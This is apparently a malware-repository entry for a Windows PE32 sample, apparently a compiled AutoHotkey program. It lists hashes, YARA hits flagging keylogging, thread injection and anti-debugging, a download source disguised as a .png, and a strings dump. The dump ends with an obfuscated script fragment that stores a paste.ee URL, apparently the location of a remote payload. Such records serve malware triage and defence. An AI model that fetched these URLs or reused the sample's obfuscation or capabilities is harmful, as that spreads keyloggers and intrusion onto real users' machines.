Warning! We are currently in recovery mode. The complete archive is not available.

Sample details: d1d714fc9bde4aad75998ba45a933678 --

Hashes
MD5: d1d714fc9bde4aad75998ba45a933678
SHA1: a7da074592bcadd8e26592766d657e9ecc3580e5
SHA256: 9e47d8be989029238bc519097846c8ed92081d790b1e1429a52e0932126ab1b7
SSDEEP: 24576:nNR2zaQBt37/CZ0w1PeWnzqhqCC6+PELef:+UsrC6aEk
Details
File Type: PE32
Yara Hits
YRP/VC8_Microsoft_Corporation | YRP/Microsoft_Visual_Cpp_8 | YRP/IsPE32 | YRP/IsWindowsGUI | YRP/IsBeyondImageSize | YRP/HasRichSignature | YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/anti_dbg | YRP/inject_thread | YRP/escalate_priv | YRP/screenshot | YRP/keylogger | YRP/win_mutex | YRP/win_registry | YRP/win_token | YRP/win_files_operation | YRP/win_hook | YRP/Str_Win32_Winsock2_Library | YRP/Str_Win32_Internet_API |
Source
https://e.coka.la/w1OJ7Z.png
Strings
		!This program cannot be run in DOS mode.
`.rdata
@.data
D$8QRP
L$4QPS
:O r8<
	trHtaH
L$4WUP
u'8D$/
T$@@PQRh@
D$4Ph@
PWQVUj
USRPQ2
<nu hM
<[t$<\t 
D$4QPVSW
L$0RPQ
T$,URVS
L$ WRPQ
thHt6H
tTIt,I
T$ 9t$
tHh\1J
E$_^][
T$$Rh`3J
T$$QRVU
L$$Qh`3J
D$$RPj
@ SUVW
PSVUVS
																
																															
																															
																
																															
																															
F(:F)r+
RQh47J
(v Wh@7J
V+RUWQP
t*h((J
D$ <Vu
L$,RSW
|$0UPQ
VtXIt/Iut
9L$8td
8\$	tL:
L$0QSjn
tIhTJJ
tIh\1J
tah\1J
t+h KJ
trh0LJ
u"VhpMJ
SSSjhW
SSSjhW
SSSjhW
D$\PQ3
T$4QR3
L$4PQ3
t.;\$ u(
t=Ht&H
9L$DtU
:t!j:P
l$,h\PJ
|$09T$,
f97tK9t$,u/V
UWhdZJ
UUUUUUS
VVVjgU
M`QhHUJ
l$ _^][
L$ Uh8ZJ
<ore<qwa
u1Phh]J
-uRf9E
	t4h\PJ
\$$f9}
t$ f9]
t$ ;t$8
<it'<pt#
T$HRPW
L$8RPQ
										
																															
																													
\$DVUS
@PQVW3
D$DPUS
ujh|bJ
							
																														
																																																		
																																								
																																															
																			
L$ VQj
t@8H=u
Su3jRj
L$(QRW
>tu	9~
t{WWWjsU
WWWWWj
T$&h0JJ
D$&h`'J
T$&hp'J
T$&h,jJ
D$&h@jJ
L$$h\jJ
T$&h0JJ
L$&hp'J
T$&hdjJ
D$&hxjJ
L$&h@jJ
L$&h8JJ
T$&h0JJ
L$ h(kJ
T$ h8kJ
T$ hDkJ
D$ hPkJ
L$ hhkJ
D$,hHJJ
T$ h,lJ
D$ h<lJ
L$ hHlJ
T$ hXlJ
D$ hhlJ
L$ hxlJ
T$ hTIJ
D$ hlIJ
L$ h`IJ
T$ h IJ
D$ hxIJ
L$ h0IJ
T$ h8IJ
D$ hDIJ
L$ hLIJ
D$ hX J
L$$h mJ
T$&h(mJ
D$&h`'J
L$&h0mJ
T$&hDmJ
D$&hp'J
L$&hPmJ
T$&h`mJ
D$&htmJ
L$&h|mJ
L$&h(nJ
T$&h@nJ
D$&hPnJ
L$&h`nJ
T$ hpnJ
D$ h|nJ
D$,hpnJ
D$ h(oJ
8L$$uUj
D$(PVh(
L$$QUS
D$(_[^
t	G;=<fL
unhp'J
																															
<t?Ot O
t%<kt!<rt
T$(RVj
D$(PVj
T$(RVj
D$(PVj
D$@f90t&
L$lQPV3
L$'QVR
D$ VPt
T$dPQRS
T$hWPQRS
T$(RVj
D$(PVj
T$(RVj
D$ WVP
L$ RPQ
tG;|$<t-
RPh 3J
tVh8_J
D$LRPQ
L$$RPQ
 !"#$%%&'())*+,-./0123456789:;<="">?
EE""""FFFFFGHFFIJKLMNOPQRSTTUVWX
YZ[\]^^__`abcdefghijklmnopqrstuvwxyz{|}~
t)f9(u$
t(f9(u#
Ht"HuFW
D$4PRj
D$4PRj
D$ PUj
T$ RUj
|$T.u!f
|$T.u f
L$0RWSP
T|@f9T$@
T$@@PQRh@
<	r{< ww<
PRQhd|J
PQh4|J
QPh\}J
RQh\}J
t	F;5d
<G9s(~4
L$8QRPW
t>hLNJ
t6hLNJ
tyhH1J
tah\1J
D$ f97
l$ f9u
L$,jHPQ
T$`jHRP
u?9D$$u
D$\QVRh
L$xSQRh
L$PQRh
Wf9.ty
f9(u4;
D$8+D$0
T$H+L$4
T$$;T$
D$LPQf
L$,RPQ
T$,PSR
L$,RPQ
																							
						
D$0+D$(
D$4+D$,
l$DVWP
|$$+|$
D$ +D$
D$ +D$
D$$+D$
9D$H}P
T$HRPQ
L$HQUS
D$(;D$ 
L$ QPj
$Rh |G
SPh8ZJ
~m_^][
D$ +D$
D$$+D$
VPh8ZJ
RQQQP3
D$,PFG
L$,WVQ
L$8RPWVj
D$,VWP
T$8RPQS
L$HSVQ
PQRSVj
\$$9\$D
C;\$@}
T$$;T$D|
t$ ;t$p
t$,9D$D
D$T;D$@}
D$$;D$D
t$ ;t$p
LF=plL
LF=xiL
D$4+D$,
													
T$(+T$ 
|$,+|$$
D$<PQS
T$<RPS
T$<RPS
L$<QRS
t(Hu-9F
T$$PQR
T$0@PQRh@
L$8Qh@
u _^]3
\$08L$
f;D$$u
f;D$$uh
T$ PQRS
\$,9\$ 
D$0;L$<u
D$,;D$ 
L$,;L$<r
							
|D.\t 
QVSWUR
T$4RUP
D$pj}P
T$pj\R
D$$PWVS
B0_^][
L$$QSUV
T$8j\R
|$ uif
|$T.u f
u		D$(
\$$uyf
f9L$htUj
2w	f95
u1j?h|
9D$$~*
@;D$$|
T$0RPW
T$$PQRh
L$ VQP
=ERCPtK-PCRE
D$ )D$
;L$,~E
;t$,| 
8ERCPu
WWWWQRWP
t(Hu-9F
9t$(u29t$8u,
D$(9D$
D$hF;u
D$(;D$
L$@QWh`
	D$0	D$,
T$ RPSQ
<w\t&f
l$hVWh
L$$+L$
T$(+T$ j
L$DQWf
T$PRPS
D$$+D$
D$ +D$
SUVWhp
t$4f9t$HtK
t'f97t"h
T$$Rhh
T$$Rhx
T$(RSP
T$,RVP
T$0RVP
L$ QSR
f9<Vu<
BRPQh@
-tcj:V
^4SSh,
tCUUUj
AH_^][
F;5PlL
T$$RS3
u*9D$$u$
T$$VRP
L$$VQP
L$DWh8ZJ
L$$RPQU
D$8+D$0
D$<+D$4
T$4RPj
D$,_^][
f;NFuG
L$<+L$4
D$8+D$0
D$PPQR
D$4PQj
|$HCSRh
8\$,t3
D$,PVQ
F;5PlL
ux9{xu/
Cx9{|u/
L$4f90
9D$(~r
9D$4~A
T$DPQhX
T$DPQh
L$DRPhX
L$DRPh
L$DRPh
L$DRPh
T$<PQSh,
D$@QRh,
D$@QRh,
D$`HPh@
L$@RPh,
T$@QSPhLNJ
D$@QRh,
D$@QRh,
D$@QRh,
T$@PQh,
L$HQRj
L$@RPh,
D$<QRVh,
D$@QRh,
L$DRPh
D$P+D$H
L$L+D$H+L$D
L$HQRj
						
8D$xt$
u	8D$x
u	8D$x
8D$xt	
u8PPPP
8D$xtW
u)hdLJ
8D$xt:
u38D$xt!
8D$xt	
u*8D$xt
u#8D$xt
D$8+D$0
9\$xtl
									
f;QFu=
D$$QRP
L$8QRj
D$@;D$
T$@+T$8
T$@+T$8
D$<+D$4
D$@+D$8
\$P+l$D+\$H
L$|+L$t+
QSUVPR
tEHt(Ht
D$`PVhX
L$dQ@P
4FC;\$
D$$_^[
L$8QRh<
										
															
						
																																	
																																												
SUVWu/
t|_^][Y
tH_^][Y
T$,+T$$
D$(+D$ 
T$4RPj
9l$<ur
T$(RUhL
D$0Pj2
D$(PSW
D$(Ph,
\$$Ph,
L$(QSW
								
u/f9LE
D$(SQR
D$ j	P
F;5PlL
FtG;=PlL
u"8^=u
SVWt	3
D$$;D$
4SVW;A
;D$<|9
QRSVWP
D$$PVh
D$(XiJ
L$4QVS
L$$QPSR
D$$PQQ
RQQQSP
RQQQSP
D$$SVj
D$4PVW
\$ 9D$0
n,;|$0
48;t$0
^,;|$0
xG;|$0s
u	_^]2
t\Kt=Kt
QSVWj@
8T$4tZ
D$ +D$
^[]_@Y
^[]_@Y
l$ ;D$,
\$,;l$(
t4;D$$
L$DSQV
|$L;D$(rJ
<J9|$Tu"
D$<QRP
l$$+D$(
L$`PQWU
uO_^][
T$lPQRU
L$`QRPW
\$HUVW
L$<PQW
u3_^][
t+_^][
T$ VRU
t3Hu89F
Ht?HuD
t(Hu-9F
t$Hu)9^
t$Hu)9^
@ HtlHtV
xStQSU
auyf9]
auUf9Z
L$0QWR
l$>jDR
@ Ht|Htg
L$ WQV
\$8VWS
;t$0tV
D$0URQ
						
|$ #u|
9D$Xt"
D$$9D$T
D$P9z$w
D$$;D$T
D$P9z$w
ur9l$,
<O;p,|
D$,;B,
T$,9Q,~1
T$,;Q,|
T$dQRP
<G;n,|
	BD;J@~
L$`_^]
t9_^]3
T$4RWWWW
L$4QPPPP
L$L;L$8vR3
;L$8v@
L$$VQUW
T$$QRUP
L$$PQSU
A;V|w(
@PQSRW
D$$+|$$
u\C;\$
D$x+Qx
T$|+Ax
9HDt	;hx
f;S,u 
T$(;T$
RPQSUF
D$(;D$
t!;h|r
BRPQWSVU
BRPQWSVU
@PQRWSVU
BRPQWSVU
9D$$t89D$(t2A
AQVRWSPU
BRVPWSQU
9D$$t+A
AQVRWSPU
BRVPWSQU
AQRPWVSU
BRPQWVSU
BRPQWVSU
@PQRWVSU
BRPQWVSU
BRQSPW
D$(WPU
AQRSVPWU
@PQSVRW
@PQSVRWU
D$(;D$
RPWQVU
PSQRUF
AQSRVWPU
BRSPVWQU
@PQRVWSU
AQRPVWSU
RWPQUC
QRSPWUF
QRSPWUF
QRSPWUF
QRSPVUG
QRSPWUF
PQSRWUF
QRSPWUF
RPSQVUG
PQVRSUG
PQVRSUG
PQSRVUG
PVQRUG
QVSRPUG
@PQRWVSU
 !"#$%%%%%%&&'()*+%%%%%%&&'()*+,,,,,,--./012QQQQQQQQ334556789999:;<;<=>=?@AB=?@ABQQQQQCDEFGHIJKLMN
PPPPPPP
9E u	9E$
f9L$ t4;
G;D$Lvj
L$<f;L$
wa;\$Hv7f
ERCPt'
ERCPt*
ERCPt;
ERCPt+
u)jAXf;
u)jAXf;
9U tO9U$uE9U(uE3
9E vgPQj
9U$tE+
9u(vEVSj
9u v&VQj
v	N+D$
^SSSSS
j@j ^V
t"SS9] u
URPQQh
t	j\Yf
QQSVWh
PPPPPPPP
PPPPPPPP
tCHt(Ht 
;t$,v-
UQPXY]Y[
v	N+D$
<+t"<-t
+t HHt
QQSVWd
VC20XC00U
t*=RCC
;7|G;p
tR99u2
CorExitProcess
bad allocation
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
Unknown exception
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
GetProcessWindowStation
GetUserObjectInformationW
GetLastActivePopup
GetActiveWindow
MessageBoxW
(null)
`h````
xpxxxx
 Complete Object Locator'
 Class Hierarchy Descriptor'
 Base Class Array'
 Base Class Descriptor at (
 Type Descriptor'
`local static thread guard'
`managed vector copy constructor iterator'
`vector vbase copy constructor iterator'
`vector copy constructor iterator'
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector vbase copy constructor iterator'
`eh vector copy constructor iterator'
`managed vector destructor iterator'
`managed vector constructor iterator'
`placement delete[] closure'
`placement delete closure'
`omni callsig'
 delete[]
 new[]
`local vftable constructor closure'
`local vftable'
`udt returning'
`copy constructor closure'
`eh vector vbase constructor iterator'
`eh vector destructor iterator'
`eh vector constructor iterator'
`virtual displacement map'
`vector vbase constructor iterator'
`vector destructor iterator'
`vector constructor iterator'
`scalar deleting destructor'
`default constructor closure'
`vector deleting destructor'
`vbase destructor'
`string'
`local static guard'
`typeof'
`vcall'
`vbtable'
`vftable'
operator
 delete
__unaligned
__restrict
__ptr64
__eabi
__clrcall
__fastcall
__thiscall
__stdcall
__pascal
__cdecl
__based(
`h`hhh
xppwpp
1#QNAN
1#SNAN
SendInput
RtlGetVersion
RemoveClipboardFormatListener
AddClipboardFormatListener
BlockInput
GetProcessId
GetLayeredWindowAttributes
EnumDisplayMonitors
GetMonitorInfoW
GetDiskFreeSpaceExW
GetCursorInfo
GetProcessImageFileNameW
CreateProcessWithLogonW
InternetOpenW
InternetOpenUrlW
InternetCloseHandle
InternetReadFileExA
InternetReadFile
SHEmptyRecycleBinW
CreateToolhelp32Snapshot
Process32FirstW
Process32NextW
Arabic
Armenian
Avestan
Balinese
Bengali
Bopomofo
Brahmi
Braille
Buginese
Canadian_Aboriginal
Carian
Cherokee
Common
Coptic
Cuneiform
Cypriot
Cyrillic
Deseret
Devanagari
Egyptian_Hieroglyphs
Ethiopic
Georgian
Glagolitic
Gothic
Gujarati
Gurmukhi
Hangul
Hanunoo
Hebrew
Hiragana
Imperial_Aramaic
Inherited
Inscriptional_Pahlavi
Inscriptional_Parthian
Javanese
Kaithi
Kannada
Katakana
Kayah_Li
Kharoshthi
Lepcha
Linear_B
Lycian
Lydian
Malayalam
Mandaic
Meetei_Mayek
Mongolian
Myanmar
New_Tai_Lue
Ol_Chiki
Old_Italic
Old_Persian
Old_South_Arabian
Old_Turkic
Osmanya
Phags_Pa
Phoenician
Rejang
Samaritan
Saurashtra
Shavian
Sinhala
Sundanese
Syloti_Nagri
Syriac
Tagalog
Tagbanwa
Tai_Le
Tai_Tham
Tai_Viet
Telugu
Thaana
Tibetan
Tifinagh
Ugaritic
ACCEPT
COMMIT
 !""#$%&'((()*+,-./0123456789:;<=>?@AABCDEFGHFIJKKALAAM
NOPQRSTUVWXYZ[\F]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]^]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]_`aaaaaaaabccdefghijklmno"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""pqqqqqqqqqqqqqqqqrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr]]stuvwwxyz{|}~
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
xdigit
no error
\ at end of pattern
\c at end of pattern
unrecognized character follows \
numbers out of order in {} quantifier
number too big in {} quantifier
missing terminating ] for character class
invalid escape sequence in character class
range out of order in character class
nothing to repeat
operand of unlimited repeat could match the empty string
internal error: unexpected repeat
unrecognized character after (? or (?-
POSIX named classes are supported only within a class
missing )
reference to non-existent subpattern
erroffset passed as NULL
unknown option bit(s) set
missing ) after comment
parentheses nested too deeply
regular expression is too large
failed to get memory
unmatched parentheses
internal error: code overflow
unrecognized character after (?<
lookbehind assertion is not fixed length
malformed number or name after (?(
conditional group contains more than two branches
assertion expected after (?(
(?R or (?[+-]digits must be followed by )
unknown POSIX class name
POSIX collating elements are not supported
this version of PCRE is compiled without UTF support
spare error
character value in \x{...} sequence is too large
invalid condition (?(0)
\C not allowed in lookbehind assertion
PCRE does not support \L, \l, \N{name}, \U, or \u
number after (?C is > 255
closing ) for (?C expected
recursive call could loop indefinitely
unrecognized character after (?P
syntax error in subpattern name (missing terminator)
two named subpatterns have the same name
invalid UTF-8 string
support for \P, \p, and \X has not been compiled
malformed \P or \p sequence
unknown property name after \P or \p
subpattern name is too long (maximum 32 characters)
too many named subpatterns (maximum 10000)
repeated subpattern is too long
octal value is greater than \377 in 8-bit non-UTF-8 mode
internal error: overran compiling workspace
internal error: previously-checked referenced subpattern not found
DEFINE group contains more than one branch
repeating a DEFINE group is not allowed
inconsistent NEWLINE options
\g is not followed by a braced, angle-bracketed, or quoted name/number or by a plain number
a numbered reference must not be zero
an argument is not allowed for (*ACCEPT), (*FAIL), or (*COMMIT)
(*VERB) not recognized
number is too big
subpattern name expected
digit expected after (?+
] is an invalid data character in JavaScript compatibility mode
different names for subpatterns of the same number are not allowed
(*MARK) must have an argument
this version of PCRE is not compiled with Unicode property support
\c must be followed by an ASCII character
\k is not followed by a braced, angle-bracketed, or quoted name
internal error: unknown opcode in find_fixedlength()
\N is not supported in a class
too many forward references
disallowed Unicode code point (>= 0xd800 && <= 0xdfff)
invalid UTF-16 string
AtlAxGetControl
AtlAxWinInit
StrCmpLogicalW
SetMenuInfo
RegDeleteKeyExW
IsWow64Process
GdiplusStartup
GdiplusShutdown
GdipCreateBitmapFromFile
GdipCreateHBITMAPFromBitmap
GdipDisposeImage
SetWindowTheme
IsHungAppWindow
Error text not found (please report)
DEFINE
UTF16)
NO_START_OPT)
ANYCRLF)
BSR_ANYCRLF)
BSR_UNICODE)
argument is not a compiled regular expression
argument is compiled in 8 bit mode
internal error: opcode not recognized
internal error: missing capturing bracket
failed to get memory
@Access violation - no RTTI data!
Bad dynamic_cast!
bad exception
WSOCK32.dll
joyGetPosEx
mciSendStringW
mixerOpen
mixerGetDevCapsW
mixerGetLineInfoW
mixerClose
mixerGetLineControlsW
mixerGetControlDetailsW
mixerSetControlDetails
waveOutGetVolume
waveOutSetVolume
joyGetDevCapsW
WINMM.dll
GetFileVersionInfoSizeW
GetFileVersionInfoW
VerQueryValueW
VERSION.dll
InitCommonControlsEx
ImageList_GetIconSize
ImageList_Create
ImageList_Destroy
ImageList_AddMasked
ImageList_ReplaceIcon
CreateStatusWindowW
COMCTL32.dll
GetModuleBaseNameW
GetModuleFileNameExW
PSAPI.DLL
MulDiv
GetTickCount
SetCurrentDirectoryW
InitializeCriticalSection
SetErrorMode
GetCurrentDirectoryW
GlobalLock
GlobalAlloc
GlobalFree
GlobalUnlock
GetCurrentThreadId
lstrcmpiW
CreateThread
SetThreadPriority
GetExitCodeThread
CloseHandle
CreateMutexW
GetLastError
GetProcAddress
GetModuleHandleW
GetVersionExW
GetCPInfo
DeleteCriticalSection
GetModuleFileNameW
GetSystemTimeAsFileTime
FindResourceW
SizeofResource
LoadResource
LockResource
FindFirstFileW
FindNextFileW
FindClose
FileTimeToLocalFileTime
SetEnvironmentVariableW
MoveFileW
OutputDebugStringW
CreateProcessW
GetFileAttributesW
WideCharToMultiByte
MultiByteToWideChar
GetExitCodeProcess
WriteProcessMemory
ReadProcessMemory
GetCurrentProcessId
OpenProcess
TerminateProcess
SetPriorityClass
SetLastError
GetEnvironmentVariableW
GetLocalTime
GetDateFormatW
GetTimeFormatW
GetDiskFreeSpaceW
SetVolumeLabelW
CreateFileW
DeviceIoControl
GetDriveTypeW
GetVolumeInformationW
CreateDirectoryW
ReadFile
WriteFile
DeleteFileW
SetFileAttributesW
LocalFileTimeToFileTime
SetFileTime
GetFileSizeEx
GetSystemTime
GetSystemDefaultUILanguage
GetComputerNameW
GetWindowsDirectoryW
GetTempPathW
GetFullPathNameW
GetShortPathNameW
LoadLibraryW
FreeLibrary
EnterCriticalSection
LeaveCriticalSection
VirtualProtect
QueryDosDeviceW
CompareStringW
RemoveDirectoryW
CopyFileW
GetCurrentProcess
FormatMessageW
GetPrivateProfileStringW
GetPrivateProfileSectionW
GetPrivateProfileSectionNamesW
WritePrivateProfileStringW
WritePrivateProfileSectionW
SetEndOfFile
GetACP
GetFileType
GetStdHandle
SetFilePointerEx
SystemTimeToFileTime
FileTimeToSystemTime
GetFileSize
VirtualAllocEx
VirtualFreeEx
EnumResourceNamesW
LoadLibraryExW
GlobalSize
KERNEL32.dll
IsClipboardFormatAvailable
CharUpperW
GetDlgCtrlID
GetParent
SetTimer
GetMessageW
GetForegroundWindow
GetWindowThreadProcessId
GetClassNameW
GetFocus
PeekMessageW
KillTimer
TranslateAcceleratorW
GetKeyState
GetWindowLongW
SendMessageW
IsDialogMessageW
ScreenToClient
SetWindowLongW
CountClipboardFormats
ShowWindow
TranslateMessage
DispatchMessageW
IsWindow
EndDialog
FindWindowW
PostMessageW
EmptyClipboard
SetClipboardData
CloseClipboard
GetClipboardFormatNameW
GetClipboardData
OpenClipboard
ReleaseDC
CharLowerW
CallNextHookEx
GetKeyboardLayout
ToUnicodeEx
IsCharAlphaNumericW
IsCharLowerW
IsCharUpperW
PostThreadMessageW
SetWindowsHookExW
UnhookWindowsHookEx
SendMessageTimeoutW
PostQuitMessage
RegisterHotKey
UnregisterHotKey
SendInput
AttachThreadInput
GetAsyncKeyState
GetCursorPos
GetKeyboardState
SetKeyboardState
keybd_event
GetSystemMetrics
WindowFromPoint
mouse_event
GetWindowTextW
VkKeyScanExW
MapVirtualKeyExW
MapVirtualKeyW
IsCharAlphaW
DestroyWindow
DestroyIcon
LoadCursorW
RegisterClassExW
CreateWindowExW
GetMenu
EnableMenuItem
LoadAcceleratorsW
SetClipboardViewer
ChangeClipboardChain
LoadImageW
MessageBoxW
CheckMenuItem
IsWindowVisible
SetWindowTextW
GetIconInfo
SetRect
DrawTextW
AdjustWindowRectEx
SystemParametersInfoW
GetClientRect
GetWindowRect
GetQueueStatus
MoveWindow
EnumChildWindows
SetActiveWindow
GetGUIThreadInfo
SetFocus
SetWindowRgn
SetWindowPos
SetLayeredWindowAttributes
InvalidateRect
EnableWindow
GetWindowTextLengthW
EnumWindows
IsZoomed
IsIconic
RegisterWindowMessageW
GetSysColor
GetSysColorBrush
DrawIconEx
FillRect
DefWindowProcW
SetForegroundWindow
DialogBoxParamW
SendDlgItemMessageW
GetDlgItem
SetDlgItemTextW
IsWindowEnabled
MessageBeep
ClientToScreen
GetCursor
GetLastInputInfo
GetMenuItemCount
GetMenuItemID
GetSubMenu
GetMenuStringW
ExitWindowsEx
SetMenu
FlashWindow
MapWindowPoints
RedrawWindow
SetParent
GetClassInfoExW
GetAncestor
UpdateWindow
GetMessagePos
GetClassLongW
DefDlgProcW
CallWindowProcW
CheckRadioButton
IntersectRect
PtInRect
CreateAcceleratorTableW
DestroyAcceleratorTable
InsertMenuItemW
SetMenuDefaultItem
RemoveMenu
SetMenuItemInfoW
IsMenu
GetMenuItemInfoW
CreateMenu
CreatePopupMenu
SetMenuInfo
AppendMenuW
DestroyMenu
TrackPopupMenuEx
CreateIconIndirect
GetDesktopWindow
CopyImage
CreateIconFromResourceEx
EnumClipboardFormats
GetWindow
BringWindowToTop
GetTopWindow
USER32.dll
GetDeviceCaps
DeleteObject
CreateFontW
CreateSolidBrush
CreateDCW
GetStockObject
SelectObject
GetTextFaceW
GetTextMetricsW
GetObjectW
DeleteDC
CreateEllipticRgn
CreateRoundRectRgn
CreateRectRgn
CreatePolygonRgn
CreateCompatibleDC
GetDIBits
GetSystemPaletteEntries
CreateCompatibleBitmap
BitBlt
GetPixel
SetBkColor
SetTextColor
ExcludeClipRect
GetClipRgn
FillRgn
GetClipBox
GetCharABCWidthsW
SetBkMode
EnumFontFamiliesExW
CreateDIBSection
GdiFlush
GDI32.dll
GetSaveFileNameW
GetOpenFileNameW
CommDlgExtendedError
COMDLG32.dll
RegConnectRegistryW
RegCloseKey
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumValueW
RegEnumKeyExW
GetUserNameW
OpenSCManagerW
LockServiceDatabase
UnlockServiceDatabase
CloseServiceHandle
OpenProcessToken
LookupPrivilegeValueW
AdjustTokenPrivileges
RegQueryValueExW
RegCreateKeyExW
RegSetValueExW
RegDeleteKeyW
RegDeleteValueW
ADVAPI32.dll
DragQueryFileW
DragFinish
Shell_NotifyIconW
ShellExecuteExW
SHGetFolderPathW
SHGetMalloc
SHGetDesktopFolder
SHBrowseForFolderW
SHGetPathFromIDListW
SHFileOperationW
DragQueryPoint
ExtractIconW
SHELL32.dll
OleInitialize
OleUninitialize
CoCreateInstance
CoInitialize
CoUninitialize
CLSIDFromString
CoGetObject
StringFromGUID2
CreateStreamOnHGlobal
ole32.dll
OLEAUT32.dll
HeapAlloc
ExitProcess
HeapReAlloc
HeapFree
HeapSize
HeapQueryInformation
GetCommandLineW
HeapSetInformation
GetStartupInfoW
InterlockedIncrement
InterlockedDecrement
GetOEMCP
IsValidCodePage
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
HeapCreate
InitializeCriticalSectionAndSpinCount
SetHandleCount
IsProcessorFeaturePresent
GetStringTypeW
RaiseException
LCMapStringW
RtlUnwind
GetConsoleCP
GetConsoleMode
FreeEnvironmentStringsW
GetEnvironmentStringsW
QueryPerformanceCounter
SetFilePointer
FlushFileBuffers
WriteConsoleW
SetStdHandle
GetProcessHeap
VirtualQuery
.?AVtype_info@@
.?AVbad_alloc@std@@
.?AVexception@std@@
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVbad_cast@std@@
.?AVbad_typeid@std@@
.?AV__non_rtti_object@std@@
.?AUIObject@@
.?AVComObject@@
.?AV?$CKuStringT@_WVCKuStringUtilW@@@@
.?AVTextMem@@
.?AVTextFile@@
.?AVExprOpFunc@@
.?AVTextStream@@
.?AVObjectBase@@
.?AVProperty@@
.?AVLabel@@
.?AUIUnknown@@
.?AUIDispatch@@
.?AUIObjectComCompatible@@
.?AVFunc@@
.?AVObject@@
""""&*.266::>>>CCCCCHMMVV$
.?AVCStringCharFromWChar@@
.?AVCStringWCharFromChar@@
.?AV?$CKuStringT@DVCKuStringUtilA@@@@
.?AVRegExMatchObject@@
.?AVComArrayEnum@@
.?AVEnumBase@@
.?AVComEnum@@
.?AVComEvent@@
.?AVBoundFunc@@
.?AVMetaObject@@
.?AVEnumerator@Object@@
.?AVFileObject@@
.?AVbad_exception@std@@
0Au#&h
 WQV PV
@c`eV&v
rvVE0u@
@!x@07
 phDv"
"""""/
; <COMPILER: v1.1.23.00>
tutVTtpJk := "https://paste.ee/r/zBm4q"
GkAAUWLJK := "W"
GkAAUWLJK.= "c"
GkAAUWLJK.= "@@@"
